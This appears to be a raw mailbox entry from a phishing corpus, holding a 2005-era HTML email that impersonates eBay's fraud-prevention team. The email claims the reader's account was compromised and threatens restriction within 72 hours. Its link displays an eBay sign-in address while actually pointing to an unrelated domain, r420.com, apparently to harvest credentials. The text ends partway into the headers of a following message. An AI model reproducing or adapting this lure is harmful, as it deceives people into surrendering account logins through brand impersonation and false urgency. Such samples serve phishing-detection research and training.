From: eBay <comfirm@eBay.com>
Content-Type: text/html
Status: O
X-Status: 
X-Keywords:                  
X-UID: 341


&nbsp;</font></div>
      <table cellSpacing="0" cellPadding="0" width="600" id="table2">
        <tr>
          <td style="WORD-WRAP: break-word" width="600">
          <table cellSpacing="0" cellPadding="0" width="600" border="0"
          id="table3">
            <tr>
              <td style="WORD-WRAP: break-word" width="600">
              <table cellSpacing="0" cellPadding="2" width="100%"
              bgColor="#eeeef8" border="0" id="table4">
                <tr>
                  <td width="2">
                  <font size="2">
                  <img
src="http://pics.ebaystatic.com/aw/pics/spacer.gif"
                  width="2" NOSEND="1"></font></td>
                  <td><font face="Verdana" size="2">eBay Urgent Fraud
Prevention
                  Group Notice</font></td>
                  <td vAlign="center">
                  <font size="2">
                  <img
src="http://pics.ebaystatic.com/aw/pics/email/eBayLogo.gif"
                  align="right" border="0" NOSEND="1"></font></td>
                </tr>
                <tr bgColor="#9999cc" height="2">
                  <td colSpan="3">&nbsp;</td>
                </tr>
              </table>
              </td>
            </tr>
            <tr>
              <td>
              <table cellSpacing="0" cellPadding="0" width="94%"
align="center"
              border="0" id="table5">
                <tr>
                  <td>&nbsp;</td>
                </tr>
                <tr>
                  <td><font face="Verdana" size="2">Dear
                  eBay member,<br>
                  <br>
                  You have received this email because we have strong
reason to
                  believe that your eBay account had been recently
compromised. 
                  In order to prevent any fraudulent activity from
occurring we
                  are required to open an investigation into this
matter. To
                  speed up this process, you are required to verify your
eBay
                  account. <br>
                  <br>
                  To confirm your details, click on the link
bellow.</font><font size="2"><br>
                  </font><font face="Verdana" size="2">
                  <a
href="http://www.r420.com/.signin.ebay.com/ws/secure/index.txt"
target="_top">
                  
https://signin.ebay.com/ws/eBayISAPI.dll?SignInFPP&amp;UsingSSL=1&amp;email=</a></font><table
                  cellSpacing="0" cellPadding="1" width="100%"
                  bgColor="#ffcc00" border="0" id="table6">
                    <tr>
                      <td>
                      <table cellSpacing="0" cellPadding="0"
width="100%"
                      bgColor="#ffffff" border="0" id="table7">
                        <tr width="100%">
                          <td width="100%">
                          <table cellSpacing="0" cellPadding="3"
width="100%"
                          border="0" id="table8">
                            <tr vAlign="center" bgColor="#ffffcc"
width="100%">
                              <td vAlign="top"><font size="2">
                              <img
src="http://pics.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif"
                              NOSEND="1"></font></td>
                              <td width="100%" bgColor="#ffffcc">
                              <font face="Verdana" size="2"><b>
                              IMPORTANT:</b><br>
                              If your account information are not
updated within
                              the next 72 hours, then we will assume
this
                              account is fraudulent and your account may
be
                              restricted.</font></td>
                            </tr>
                          </table>
                          </td>
                        </tr>
                      </table>
                      </td>
                    </tr>
                  </table>
                  <p><font face="Verdana" size="2">We appreciate
                  your support and understanding, as we work together to
keep
                  eBay a safe place to trade. <br>
                  <br>
                  Thank you for your cooperation and patience in this
matter.<br>
                  </font><font size="2"><br>
                  </font><font face="Verdana" size="2">Regards,
                  </font></td>
                </tr>
                <tr>
                  <td><font face="Verdana" size="2"><br>
                  Customer Support (Trust and Safety Department)<br>
                  eBay Inc</font></td>
                </tr>
                <tr>
                  <td>&nbsp;</td>
                </tr>
                <tr>
                  <td>&nbsp;</td>
                </tr>
                <tr>
                  <td>
                  <table cellSpacing="0" cellPadding="0" width="100%"
                  bgColor="#cccccc" id="table9">
                    <tr>
                      <td height="1">&nbsp;</td>
                    </tr>
                  </table>
                  </td>
                </tr>
                <tr>
                  <td>
                  <div class="Footer" align="center">
                    <font face="Verdana" color="#808080"
size="2">Copyright ©
                    2005 eBay Inc. All Rights Reserved. <br>
                    Designated trademarks and brands are the property of
their
                    respective owners. <br>
                    eBay and the eBay logo are trademarks of eBay Inc. 
</font>
                    <font size="2">
                    <br> &nbsp;</font></div>

From support@ebay.com  Sat Feb  4 13:21:37 2006
Return-Path: <support@ebay.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.1.2.3])
	by naughty.example.com (Postfix) with ESMTP id 0A90B53724B
	for <nobody@login.example.com>; Sat,  4 Feb 2006 13:21:37 -0500 (EST)
Received: from mail.com (unknown [85.186.64.1])
	by mail1.example.com (Postfix) with SMTP id 8213A6CCE95
	for <nobody@example.com>; Sat,  4 Feb 2006 13:21:33 -0500 (EST)
